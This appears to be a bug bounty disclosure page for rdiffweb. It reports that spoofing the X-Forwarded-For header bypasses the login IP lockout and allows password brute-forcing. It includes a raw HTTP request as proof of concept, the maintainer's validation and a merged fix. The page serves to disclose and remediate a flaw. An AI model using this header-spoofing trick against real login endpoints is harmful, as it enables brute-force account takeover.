Bypass IP detection to brute-force password in ikus060/rdiffweb in ikus060/rdiffweb


Reported on

Sep 14th 2022


In login API, by default, the IP address will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /login/ HTTP/1.1
Cookie: session_id=79c34d46cd0e592e066e1a7b128cffee4972d4f7
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: // Change IP
Connection: close


Video POC


This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...

We are processing your report and will contact the ikus060/rdiffweb team within 24 hours. 17 days ago
ikus060/rdiffweb maintainer has acknowledged this report 17 days ago
Patrik Dufresne
16 days ago


@co0k13-cypher This is true only if Rdiffweb is not behind a reverse proxy. When rdiffweb is behind a reverse proxy the X-Forward-* header get replace by apache or nginx. In case of the vulnerability is not reproducable.

16 days ago


In the demo video I'm doing the attack right on site itself, while the vulnerability doesn't cover all cases, that doesn't mean it doesn't happen.

Patrik Dufresne validated this vulnerability 16 days ago

I confirm the vulnerability.

Chiencp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Patrik Dufresne
16 days ago


@co0k13-cypher May you plz change the affected version to 2.4.2 and earlier ?

Patrik Dufresne confirmed that a fix has been merged on 28258e 16 days ago
Patrik Dufresne has been awarded the fix bounty
15 days ago


I'm sorry the report was closed so i can't edit !

Patrik Dufresne
15 days ago


@admin May you help to change the affected version to 2.4.2 and earlier ?

Jamie Slome
15 days ago


Sorted :)

to join this conversation